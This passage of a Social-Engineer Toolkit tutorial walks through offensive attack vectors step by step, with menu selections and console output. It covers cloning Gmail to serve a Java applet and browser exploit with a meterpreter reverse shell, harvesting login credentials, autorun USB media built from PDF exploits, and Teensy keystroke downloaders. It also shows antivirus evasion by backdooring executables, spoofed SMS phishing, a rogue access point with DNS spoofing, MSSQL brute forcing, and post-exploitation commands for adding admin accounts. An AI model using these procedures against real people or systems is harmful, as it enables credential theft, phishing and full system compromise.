2959 30) FireFox 3.5 escape Return Value Memory Corruption
2960
2961 31) FireFox 3.6.16 mChannel use after free vulnerability
2962
2963 32) Metasploit Browser Autopwn (USE AT OWN RISK!)
2964
2965set:payloads> 8
2966
2967[*] Cloning the website: https://gmail.com
2968
2969[*] This could take a little bit…
2970
2971[*] Injecting Java Applet attack into the newly cloned website.
2972
2973[*] Filename obfuscation complete. Payload name is: x5sKAzS
2974
2975[*] Malicious java applet website prepped for deployment
2976
2977[*] Injecting iframes into cloned website for MSF Attack….
2978
2979[*] Malicious iframe injection successful…crafting payload.
2980
2981[*] Launching MSF Listener…
2982
2983[*] This may take a few to load MSF…
2984
2985[-] ***
2986
2987[-] * WARNING: No database support: String User Disabled Database Support
2988
2989[-] ***
2990
2991 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
2992
2993+ — –=[ 891 exploits – 484 auxiliary – 149 post
2994
2995+ — –=[ 251 payloads – 28 encoders – 8 nops
2996
2997 =[ svn r15540 updated 23 days ago (2012.06.27)
2998
2999resource (src/program_junk/meta_config)> use windows/browser/ms09_002_memory_corruption
3000
3001resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
3002
3003PAYLOAD => windows/meterpreter/reverse_tcp
3004
3005resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
3006
3007LHOST => 172.16.32.129
3008
3009resource (src/program_junk/meta_config)> set LPORT 443
3010
3011LPORT => 443
3012
3013resource (src/program_junk/meta_config)> set URIPATH /
3014
3015URIPATH => /
3016
3017resource (src/program_junk/meta_config)> set SRVPORT 8080
3018
3019SRVPORT => 8080
3020
3021resource (src/program_junk/meta_config)> set ExitOnSession false
3022
3023ExitOnSession => false
3024
3025resource (src/program_junk/meta_config)> exploit -j
3026
3027[*] Exploit running as background job.
3028
3029msf exploit(ms09_002_memory_corruption) >
3030
3031[*] Started reverse handler on 172.16.32.129:443
3032
3033[*] Using URL: http://0.0.0.0:8080/
3034
3035[*] Local IP: http://172.16.32.129:8080/
3036
3037[*] Server started.
3038
3039Now that we have everything running, lets browse to the website and see what’s there. We first get greeted with the site has been moved…
3040
3041We click the link and we are hit with a Metasploit exploit, look at the handler on the backend.
3042
3043[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 172.16.32.131:1329…
3044
3045msf exploit(ms09_002_memory_corruption) >
3046
3047This exploit fails because we are using Internet Explorer 6, once this fails, check out the victims screen:
3048
3049We hit run, and we have a meterpreter shell. In this instance we would be redirected back to the original Google because the attack was successful. If you also notice, when using the Java Applet we automatically migrate to a separate thread (process) and happens to be notepad.exe. Reason being is if the victim closes the browser, we will be safe and the process won’t terminate our meterpreter shell.
3050
3051[*] Sending stage (748544 bytes) to 172.16.32.131
3052
3053[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 -0400 2010
3054
3055[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript ‘migrate -f’
3056
3057[*] Current server process: java.exe (824)
3058
3059[*] Spawning a notepad.exe host process…
3060
3061[*] Migrating into process ID 3044
3062
3063[*] New server process: notepad.exe (3044)
3064
3065msf exploit(ms09_002_memory_corruption) >
3066
3067Let’s say that this attack failed and the user hit cancel. He would then be prompted to enter his/her username and password into the username/password field.
3068
3069[*] WE GOT A HIT! Printing the output:
3070
3071PARAM: ltmpl=default
3072
3073PARAM: ltmplcache=2
3074
3075PARAM: continue=https://mail.google.com/mail/?ui=html
3076
3077PARAM: zy=l
3078
3079PARAM: service=mail
3080
3081PARAM: rm=false
3082
3083PARAM: dsh=-8578216484479049837
3084
3085PARAM: ltmpl=default
3086
3087PARAM: ltmpl=default
3088
3089PARAM: scc=1
3090
3091PARAM: ss=1
3092
3093PARAM: timeStmp=
3094
3095PARAM: secTok=
3096
3097PARAM: GALX=fYQL_bXkbzU
3098
3099POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
3100
3101POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
3102
3103PARAM: rmShown=1
3104
3105PARAM: signIn=Sign+in
3106
3107PARAM: asts=
3108
3109[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
3110Infectious Media Generator
3111
3112Moving on to the physical attack vectors and a completely different attack method, we will be utilizing the Infectious USB/DVD/CD attack vector. This attack vector will allow you to import your own malicious executable or one of those within Metasploit to create a DVD/CD/USB that incorporates an autorun.inf file. Once this device is inserted it will call autorun and execute the executable. New in the most recent version, you can utilize file-format exploits as well, if your worried that an executable will trigger alerts, you can specify a file format exploit that will trigger an overflow and compromise the system (example an Adobe exploit).
3113
3114Select from the menu:
3115
3116 1) Spear-Phishing Attack Vectors
3117
3118 2) Website Attack Vectors
3119
3120 3) Infectious Media Generator
3121
3122 4) Create a Payload and Listener
3123
3124 5) Mass Mailer Attack
3125
3126 6) Arduino-Based Attack Vector
3127
3128 7) SMS Spoofing Attack Vector
3129
3130 8) Wireless Access Point Attack Vector
3131
3132 9) QRCode Generator Attack Vector
3133
3134 10) Powershell Attack Vectors
3135
3136 11) Third Party Modules
3137
3138 99) Return back to the main menu.
3139
3140set> 3
3141
3142 The Infectious USB/CD/DVD module will create an autorun.inf file and a
3143
3144 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
3145
3146 run if autorun is enabled.
3147
3148 Pick the attack vector you wish to use: fileformat bugs or a straight executable.
3149
3150 1) File-Format Exploits
3151
3152 2) Standard Metasploit Executable
3153
3154 99) Return to Main Menu
3155
3156set:infectious> 1
3157
3158Enter the IP address for the reverse connection (payload): 172.16.32.129
3159
3160Select the file format exploit you want.
3161
3162 The default is the PDF embedded EXE.
3163
3164 ********** PAYLOADS **********
3165
3166 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
3167
3168 2) SET Custom Written Document UNC LM SMB Capture Attack
3169
3170 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
3171
3172 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
3173
3174 5) Adobe Flash Player “Button” Remote Code Execution
3175
3176 6) Adobe CoolType SING Table “uniqueName” Overflow
3177
3178 7) Adobe Flash Player “newfunction” Invalid Pointer Use
3179
3180 8) Adobe Collab.collectEmailInfo Buffer Overflow
3181
3182 9) Adobe Collab.getIcon Buffer Overflow
3183
3184 10) Adobe JBIG2Decode Memory Corruption Exploit
3185
3186 11) Adobe PDF Embedded EXE Social Engineering
3187
3188 12) Adobe util.printf() Buffer Overflow
3189
3190 13) Custom EXE to VBA (sent via RAR) (RAR required)
3191
3192 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
3193
3194 15) Adobe PDF Embedded EXE Social Engineering (NOJS)
3195
3196 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
3197
3198 17) Apple QuickTime PICT PnSize Buffer Overflow
3199
3200 18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
3201
3202 19) Adobe Reader u3D Memory Corruption Vulnerability
3203
3204 20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
3205
3206set:payloads> 1
3207
32081. Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker.
3209
32102. Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker.
3211
32123. Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker.
3213
32144. Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
3215
32165. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
3217
32186. Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system.
3219
32207. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
3221
3222Enter the payload you want (press enter for default):
3223
3224[*] Windows Meterpreter Reverse TCP selected.
3225
3226Enter the port to connect back on (press enter for default):
3227
3228[*] Defaulting to port 443…
3229
3230[*] Generating fileformat exploit…
3231
3232[*] Please wait while we load the module tree…
3233
3234[*] Started reverse handler on 172.16.32.129:443
3235
3236[*] Creating ‘template.pdf’ file…
3237
3238[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
3239
3240[*] Payload creation complete.
3241
3242[*] All payloads get sent to the src/program_junk/template.pdf directory
3243
3244[*] Payload generation complete. Press enter to continue.
3245
3246[*] Your attack has been created in the SET home directory folder “autorun”
3247
3248[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
3249
3250Do you want to create a listener right now yes or no: yes
3251
3252[-] ***
3253
3254[-] * WARNING: No database support: String User Disabled Database Support
3255
3256[-] ***
3257
3258 _ _
3259
3260 _ | | (_)_
3261
3262 ____ ____| |_ ____ ___ ____ | | ___ _| |_
3263
3264| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
3265
3266| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
3267
3268|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
3269
3270 |_|
3271
3272 resource (/pentest/exploits/set/src/program_junk/meta_config)> use multi/handler
3273
3274resource (/pentest/exploits/set/src/program_junk/meta_config)> set payload windows/meterpreter/reverse_tcp
3275
3276payload => windows/meterpreter/reverse_tcp
3277
3278resource (/pentest/exploits/set/src/program_junk/meta_config)> set lhost 172.16.32.129
3279
3280lhost => 172.16.32.129
3281
3282resource (/pentest/exploits/set/src/program_junk/meta_config)> set lport 443
3283
3284lport => 443
3285
3286resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
3287
3288[*] Exploit running as background job.
3289
3290msf exploit(handler) >
3291
3292[*] Started reverse handler on 172.16.32.129:443
3293
3294[*] Starting the payload handler…
3295
3296In this example we specified a file format attack in order to create the infectious USB/DVD/CD. A folder is created called ‘SET’ in the root of the SET directory that contains the components you will need to copy over to the media device of your choosing. Once inserted, the file format exploit would trigger an overflow and if they were susceptible, it would completely compromise their system with a meterpreter shell. If we would have selected the executable section, it will have been the same avenues as previously walked through in this chapter but instead of triggering an exploit, it would trigger an executable.
3297
3298When doing an ls –al in the SET directory you should notice that there is an “autorun” folder. Burn the contents of that directory to a DVD or write to a USB device. Once inserted you would be presented with a shell.
3299
3300[*] Sending stage (748544 bytes) to 172.16.32.131
3301
3302[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:42:32 -0400 2010
3303
3304[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript ‘migrate -f’
3305
3306[*] Current server process: java.exe (824)
3307
3308[*] Spawning a notepad.exe host process…
3309
3310[*] Migrating into process ID 3044
3311
3312[*] New server process: notepad.exe (3044)
3313
3314msf exploit(ms09_002_memory_corruption) >
3315Teensy USB HID Attack Vector
3316
3317The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions by keyboard emulation. Traditionally when you insert a DVD/CD or USB if autorun is disabled, your autorun.inf isn’t called and you can’t execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert the device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com. Quickly after David Kennedy, Josh Kelley, and Adrian Crenshaw’s talk on the Teensy devices, a PS3 hack came out utilizing the Teensy devices and they are currently backordered during the time of writing this tutorial.
3318
3319Let’s setup or Teensy device to do a WSCRIPT downloader of a Metasploit payload. What will occur here is that a small wscript file will be written out which will download an executable and execute it. This will be our Metasploit payload and is all handled through the Social-Engineer Toolkit.
3320
3321Select from the menu:
3322
3323 1) Spear-Phishing Attack Vectors
3324
3325 2) Website Attack Vectors
3326
3327 3) Infectious Media Generator
3328
3329 4) Create a Payload and Listener
3330
3331 5) Mass Mailer Attack
3332
3333 6) Arduino-Based Attack Vector
3334
3335 7) SMS Spoofing Attack Vector
3336
3337 8) Wireless Access Point Attack Vector
3338
3339 9) QRCode Generator Attack Vector
3340
3341 10) Powershell Attack Vectors
3342
3343 11) Third Party Modules
3344
3345 99) Return back to the main menu.
3346
3347set> 6
3348
3349 The Arduino-Based Attack Vector utilizes the Arduin-based device to
3350
3351 program the device. You can leverage the Teensy’s, which have onboard
3352
3353 storage and can allow for remote code execution on the physical
3354
3355 system. Since the devices are registered as USB Keyboard’s it
3356
3357 will bypass any autorun disabled or endpoint protection on the
3358
3359 system.
3360
3361 You will need to purchase the Teensy USB device, it’s roughly
3362
3363 $22 dollars. This attack vector will auto generate the code
3364
3365 needed in order to deploy the payload on the system for you.
3366
3367 This attack vector will create the .pde files necessary to import
3368
3369 into Arduino (the IDE used for programming the Teensy). The attack
3370
3371 vectors range from Powershell based downloaders, wscript attacks,
3372
3373 and other methods.
3374
3375 For more information on specifications and good tutorials visit:
3376
3377 http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
3378
3379 To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
3380
3381 Special thanks to: IronGeek, WinFang, and Garland
3382
3383 This attack vector also attacks X10 based controllers, be sure to be leveraging
3384
3385 X10 based communication devices in order for this to work.
3386
3387 Select a payload to create the pde file to import into Arduino:
3388
3389 1) Powershell HTTP GET MSF Payload
3390
3391 2) WSCRIPT HTTP GET MSF Payload
3392
3393 3) Powershell based Reverse Shell Payload
3394
3395 4) Internet Explorer/FireFox Beef Jack Payload
3396
3397 5) Go to malicious java site and accept applet Payload
3398
3399 6) Gnome wget Download Payload
3400
3401 7) Binary 2 Teensy Attack (Deploy MSF payloads)
3402
3403 8) SDCard 2 Teensy Attack (Deploy Any EXE)
3404
3405 9) SDCard 2 Teensy Attack (Deploy on OSX)
3406
3407 10) X10 Arduino Sniffer PDE and Libraries
3408
3409 11) X10 Arduino Jammer PDE and Libraries
3410
3411 12) Powershell Direct ShellCode Teensy Attack
3412
3413 99) Return to Main Menu
3414
3415set:arduino> 2
3416
3417Do you want to create a payload and listener yes or no: yes
3418
3419What payload do you want to generate:
3420
3421set> Do you want to create a payload and listener [yes|no]: : yes
3422
3423What payload do you want to generate:
3424
3425 Name: Description:
3426
3427 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
3428
3429 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3430
3431 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
3432
3433 4) Windows Bind Shell Execute payload and create an accepting port on remote system
3434
3435 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
3436
3437 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
3438
3439 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
3440
3441 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
3442
3443 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
3444
3445 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
3446
3447 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
3448
3449 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
3450
3451 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
3452
3453 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
3454
3455 15) Import your own executable Specify a path for your own executable
3456
3457Enter choice (hit enter for default):
3458
3459Below is a list of encodings to try and bypass AV.
3460
3461Select one of the below, ‘backdoored executable’ is typically the best.
3462
34631. avoid_utf8_tolower (Normal)
3464
34652. shikata_ga_nai (Very Good)
3466
34673. alpha_mixed (Normal)
3468
34694. alpha_upper (Normal)
3470
34715. call4_dword_xor (Normal)
3472
34736. countdown (Normal)
3474
34757. fnstenv_mov (Normal)
3476
34778. jmp_call_additive (Normal)
3478
34799. nonalpha (Normal)
3480
348110. nonupper (Normal)
3482
348311. unicode_mixed (Normal)
3484
348512. unicode_upper (Normal)
3486
348713. alpha2 (Normal)
3488
348914. No Encoding (None)
3490
349115. Multi-Encoder (Excellent)
3492
349316. Backdoored Executable (BEST)
3494
3495 Enter your choice (enter for default):
3496
3497[-] Enter the PORT of the listener (enter for default):
3498
3499[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
3500
3501[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
3502
3503[*] PDE file created. You can get it under ‘reports/teensy.pde’
3504
3505[*] Be sure to select “Tools”, “Board”, and “Teensy 2.0 (USB/KEYBOARD)” in Arduino
3506
3507Press enter to continue.
3508
3509[*] Launching MSF Listener…
3510
3511[*] This may take a few to load MSF…
3512
3513[-] ***
3514
3515[-] * WARNING: No database support: String User Disabled Database Support
3516
3517[-] ***
3518
3519 ____________
3520
3521< metasploit >
3522
3523 ————
3524
3525 \ ,__,
3526
3527 \ (oo)____
3528
3529 (__) )\
3530
3531 ||–|| *
3532
3533
3534
3535 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
3536
3537+ — –=[ 891 exploits – 484 auxiliary – 149 post
3538
3539+ — –=[ 251 payloads – 28 encoders – 8 nops
3540
3541 =[ svn r15540 updated 23 days ago (2012.06.27)
3542
3543resource (src/program_junk/meta_config)> use exploit/multi/handler
3544
3545resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
3546
3547PAYLOAD => windows/meterpreter/reverse_tcp
3548
3549resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
3550
3551LHOST => 0.0.0.0
3552
3553resource (src/program_junk/meta_config)> set LPORT 443
3554
3555LPORT => 443
3556
3557resource (src/program_junk/meta_config)> set ExitOnSession false
3558
3559ExitOnSession => false
3560
3561resource (src/program_junk/meta_config)> exploit -j
3562
3563[*] Exploit running as background job.
3564
3565msf exploit(handler) >
3566
3567[*] Started reverse handler on 0.0.0.0:443
3568
3569[*] Starting the payload handler…
3570
3571Now that we have everything ready, SET exports a file called teensy.pde to the reports/ folder. Copy that reports folder to wherever you have Arduino installed. With this attack, follow the instructions at PRJC on how to upload your code to the Teensy board, its relatively simple you just need to install the Teensy Loader and the Teensy libraries. Once you do that you will have an IDE interface called Arduino. One of the MOST important aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse.
3572
3573Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX, and Windows. Insert your USB device into the computer and upload your code. This will program your device with the SET generated code. Below is uploading and the code.
3574
3575Once the USB device is inserted on the victim machine, once finished you should be presented with a meterpreter shell.
3576
3577[*] Sending stage (748544 bytes) to 172.16.32.131
3578
3579[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010
3580
3581[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript ‘migrate -f’
3582
3583[*] Current server process: java.exe (824)
3584
3585[*] Spawning a notepad.exe host process…
3586
3587[*] Migrating into process ID 3044
3588
3589[*] New server process: notepad.exe (3044)
3590
3591msf exploit(ms09_002_memory_corruption) >
3592SMS Spoofing Attack Vector
3593
3594Little hint here, this module is only the beginning to a whole new mobile attack platform for newer version of SET. The folks at TB-Security.com introduced the SMS spoofing module. This module will allow you to spoof your phone number and send an SMS. This would be beneficial in social-engineering attacks utilizing the Credential Harvester. More attacks to come on this.
3595
3596Select from the menu:
3597
3598 1) Spear-Phishing Attack Vectors
3599
3600 2) Website Attack Vectors
3601
3602 3) Infectious Media Generator
3603
3604 4) Create a Payload and Listener
3605
3606 5) Mass Mailer Attack
3607
3608 6) Arduino-Based Attack Vector
3609
3610 7) SMS Spoofing Attack Vector
3611
3612 8) Wireless Access Point Attack Vector
3613
3614 9) QRCode Generator Attack Vector
3615
3616 10) Powershell Attack Vectors
3617
3618 11) Third Party Modules
3619
3620 99) Return back to the main menu.
3621
3622set> 7
3623
3624 The SMS module allows you to specially craft SMS messages and send them
3625
3626 to a person. You can spoof the SMS source.
3627
3628 This module was created by the team at TB-Security.com.
3629
3630 You can use a predefined template, create your own template or specify
3631
3632 an arbitrary message. The main method for this would be to get a user to
3633
3634 click or coax them on a link in their browser and steal credentials or
3635
3636 perform other attack vectors.
3637
3638 1) Perform a SMS Spoofing Attack
3639
3640 2) Create a Social-Engineering Template
3641
3642 99) Return to Main Menu
3643
3644set:sms>1
3645
3646 SMS Attack Menu
3647
3648 There are diferent attacks you can launch in the context of SMS spoofing,
3649
3650 select your own.
3651
3652 1. SMS Attack Single Phone Number
3653
3654 2. SMS Attack Mass SMS
3655
3656 99. Return to SMS Spoofing Menu
3657
3658set> 1
3659
3660Single SMS Attack
3661
3662set:sms> Send sms to:5555555555
3663
3664 1. Pre-Defined Template
3665
3666 2. One-Time Use SMS
3667
3668 99. Cancel and return to SMS Spoofing Menu
3669
3670 set:sms> Use a predefined template or craft a one time SMS?:1
3671
3672Below is a list of available templates:
3673
36741: Movistar: publicidad tarifa llamada
3675
36762: MRW: pedido no entregado
3677
36783: Vodafone Fool
3679
36804: Movistar: publicidad nieve
3681
36825: Movistar: publicidad aramon
3683
36846: Movistar: publicidad nokia gratis
3685
36867: Ministerio vivienda: incidencia pago
3687
36888: Vodafone: publicidad nuevo contrato
3689
36909: teabla: moviles gratis
3691
369210: Movistar: publicidad verano internet
3693
369411: Movistar: publicidad tarifa sms
3695
369612: Yavoy: regalo yavoy
3697
369813: Boss Fake
3699
370014: Movistar: oferta otoño
3701
370215: Movistar: publicidad navidad
3703
370416: TMB: temps espera
3705
370617: ruralvia: confirmacion de transferencia
3707
370818: Movistar: publicidad ROCKRIO
3709
371019: Tu Banco: visa disponible en oficina
3711
371220: Police Fake
3713
3714set:sms> Select template:2
3715
3716 Service Selection
3717
3718 There are diferent services you can use for the SMS spoofing, select
3719
3720 your own.
3721
3722 1. SohoOS (buggy)
3723
3724 2. Lleida.net (pay)
3725
3726 3. SMSGANG (pay)
3727
3728 4. Android Emulator (need to install Android Emulator)
3729
3730 99. Cancel and return to SMS Spoofing Menu
3731
3732set:sms>1
3733
3734SMS sent
3735
3736SET has completed.
3737Wireless Attack Vector
3738
3739SET has an attack vector called the wireless attack vector which will spawn an access point from a wireless interface card on your machine and leverage DNSSpoof to redirect victims browser requests to an attacker vector in SET. You could leverage this attack for example by creating the access point and then leveraging the Java Applet Attack Vector or the Multi-Attack Vector and when the victim was connected to the access point, went to a website, would then be at your attacker machine.
3740
3741Select from the menu:
3742
37431. Spear-Phishing Attack Vectors
3744
37452. Website Attack Vectors
3746
37473. Infectious Media Generator
3748
37494. Create a Payload and Listener
3750
37515. Mass Mailer Attack
3752
37536. Teensy USB HID Attack Vector
3754
37557. SMS Spoofing Attack Vector
3756
37578. Wireless Access Point Attack Vector
3758
37599. Third Party Modules
3760
376110. Update the Metasploit Framework
3762
376311. Update the Social-Engineer Toolkit
3764
376512. Help, Credits, and About
3766
376713. Exit the Social-Engineer Toolkit
3768
3769Enter your choice: 8
3770
3771Welcome to the Wireless Attack Vector, this will create an access point leveraging
3772
3773your wireless card and redirect all DNS queries to you. The concept is fairly simple,
3774
3775SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic
3776
3777to the attacker machine. It will then exit out of that menu with everything running as
3778
3779a child process.
3780
3781You can then launch any SET attack vector you want, for example the Java Applet attack and
3782
3783when a victim joins your access point and tries going to a website, will be redirected to
3784
3785your attacker machine.
3786
3787This attack vector uses AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3 to work properly.
3788
3789What do you want to do:
3790
37911. Start the SET Wireless Attack Vector Access Point
3792
37932. Stop the SET Wireless Attack Vector Access Point
3794
37953. Return to the SET main menu.
3796
3797Enter your choice: 1
3798
3799Enter the wireless network interface (ex. wlan0): eth0
3800
3801[*] Placing card in monitor mode via airmon-ng..
3802
3803[*] Spawning airbase-ng in a seperate child thread…
3804
3805[*] Sleeping 15 seconds waiting for airbase-ng to complete…
3806
3807[*] Bringing up the access point interface…
3808
3809[*] Writing the dhcp configuration file to src/program_junk
3810
3811[*] Starting the DHCP server on a seperate child thread…
3812
3813[*] Starting DNSSpoof in a seperate child thread…
3814
3815[*] SET has finished creating the attack. If you experienced issues please report them.
3816
3817[*] Now launch SET attack vectors within the menus and have a victim connect via wireless.
3818
3819[*] Be sure to come back to this menu to stop the services once your finished.
3820
3821[*] Press [return] to go back to the main menu.
3822QRCode Attack Vector
3823
3824The QRCode attack vector utilizes the ability to generate QRCodes natively in Python. When scanned, it will redirect to the SET attack vector. What’s great about this attack is the ability to redirect victims to any of the built-in attack vectors SET has available to them.
3825
3826Select from the menu:
3827
3828 1) Spear-Phishing Attack Vectors
3829
3830 2) Website Attack Vectors
3831
3832 3) Infectious Media Generator
3833
3834 4) Create a Payload and Listener
3835
3836 5) Mass Mailer Attack
3837
3838 6) Arduino-Based Attack Vector
3839
3840 7) SMS Spoofing Attack Vector
3841
3842 8) Wireless Access Point Attack Vector
3843
3844 9) QRCode Generator Attack Vector
3845
3846 10) Powershell Attack Vectors
3847
3848 11) Third Party Modules
3849
3850 99) Return back to the main menu.
3851
3852set> 9
3853
3854The QRCode Attack Vector will create a QRCode for you with whatever URL you want.
3855
3856When you have the QRCode Generated, select an additional attack vector within SET and
3857
3858deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet
3859
3860and send the QRCode via a mailer.
3861
3862Enter the URL you want the QRCode to go to: https://www.trustedsec.com
3863
3864[*] [*] QRCode has been generated under reports/qrcode_attack.png!
3865
3866QRCode generated.
3867Fast-Track Exploitation
3868
3869Fast-Track was originally created several years ago and automated several complex attack vectors. Fast-Track has additional exploits, attack vectors, and attacks that you can use during a penetration test.
3870
3871Select from the menu:
3872
3873 1) Social-Engineering Attacks
3874
3875 2) Fast-Track Penetration Testing
3876
3877 3) Third Party Modules
3878
3879 4) Update the Metasploit Framework
3880
3881 5) Update the Social-Engineer Toolkit
3882
3883 6) Update SET configuration
3884
3885 7) Help, Credits, and About
3886
3887 99) Exit the Social-Engineer Toolkit
3888
3889set> 2
3890
3891Welcome to the Social-Engineer Toolkit – Fast-Track Penetration Testing platform. These attack vectors
3892
3893have a series of exploits and automation aspects to assist in the art of penetration testing. SET
3894
3895now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
3896
3897completely rewritten and customized from scratch as to improve functionality and capabilities.
3898
3899 1) Microsoft SQL Bruter
3900
3901 2) Custom Exploits
3902
3903 99) Return to Main Menu
3904
3905set:fasttrack>1
3906
3907Welcome to the Social-Engineer Toolkit – Fast-Track Penetration Testing Microsoft SQL Brute Forcer. This attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that may be found. If that occurs, SET will then compromise the affected system by deploying a binary to hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur to convert the payload back to a binary for us.
3908
3909 1) Scan and Attack MSSQL
3910
3911 2) Connect directly to MSSQL
3912
3913 99) Return to Main Menu
3914
3915set:fasttrack:mssql>99
3916
3917Welcome to the Social-Engineer Toolkit – Fast-Track Penetration Testing platform. These attack vectors have a series of exploits and automation aspects to assist in the art of penetration testing. SET now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been completely rewritten and customized from scratch as to improve functionality and capabilities.
3918
3919 1) Microsoft SQL Bruter
3920
3921 2) Custom Exploits
3922
3923 99) Return to Main Menu
3924
3925set:fasttrack>2
3926
3927Welcome to the Social-Engineer Toolkit – Fast-Track Penetration Testing Exploits Section. This
3928
3929menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
3930
3931 1) MS08-067 (Win2000, Win2k3, WinXP)
3932
3933 2) Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
3934
3935 3) Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
3936
3937 4) RDP | Use after Free – Denial of Service
3938
3939 5) MySQL Authentication Bypass Exploit
3940
3941 6) F5 Root Authentication Bypass Exploit
3942
3943 99) Return to Main Menu
3944
3945set:fasttrack:exploits> Select the number of the exploit you want:
3946SET Interactive Shell and RATTE
3947
3948One of the newer additions to the Social-Engineer Toolkit is the completely independent SET interactive shell and RATTE, custom written independent payloads built into the toolkit. These payloads are only available through the Create a Payload and Listener and the Java Applet Attack vector. Below are examples on the usage.
3949
3950*** Pick the number of the shell you want ***
3951
39521: 172.16.32.170
3953
3954Enter your numeric choice: 1
3955
3956[*] Dropping into the Social-Engineer Toolkit Interactive Shell.
3957
3958set> ?
3959
3960Welcome to the Social-Engineer Toolkit Help Menu.
3961
3962Enter the following commands for usage:
3963
3964Command: shell
3965
3966Explanation: drop into a command shell
3967
3968Example: shell
3969
3970Command: localadmin <username> <password>
3971
3972Explanation: adds a local admin to the system
3973
3974Example: localadmin bob p@55w0rd!
3975
3976Command: domainadmin <username> <password>
3977
3978Explanation: adds a local admin to the system
3979
3980Example: domainadmin bob p@55w0rd!
3981
3982Command: download <path_to_file>
3983
3984Explanation: downloads a file locally to the SET root directory.
3985
3986Example: download C:\boot.ini
3987
3988Command: upload <path_to_file_on_attacker> <path_to_write_on_victim>
3989
3990Explanation: uploads a file to the victim system
3991
3992Example: upload /root/nc.exe C:\nc.exe
3993
3994Command: ssh_tunnel <attack_ip> <attack_ssh_port> <attack_tunnelport> <user> <pass> <tunnel_port>
3995
3996Explanation: This module tunnels ports from the compromised victims machine back to your machine.
3997
3998Example: ssh_tunnel publicipaddress 22 80 root complexpassword?! 80
3999
4000Command: ps
4001
4002Explanation: List running processes on the victim machine.
4003
4004Example: ps
4005
4006Command: kill <pid>
4007
4008Explanation: Kill a process based on process ID (number) returned from ps.
4009
4010Example: kill 3143
4011
4012Command: exec <command>
4013
4014Explanation: Execute a command on your LOCAL ‘attacker’ machine.
4015
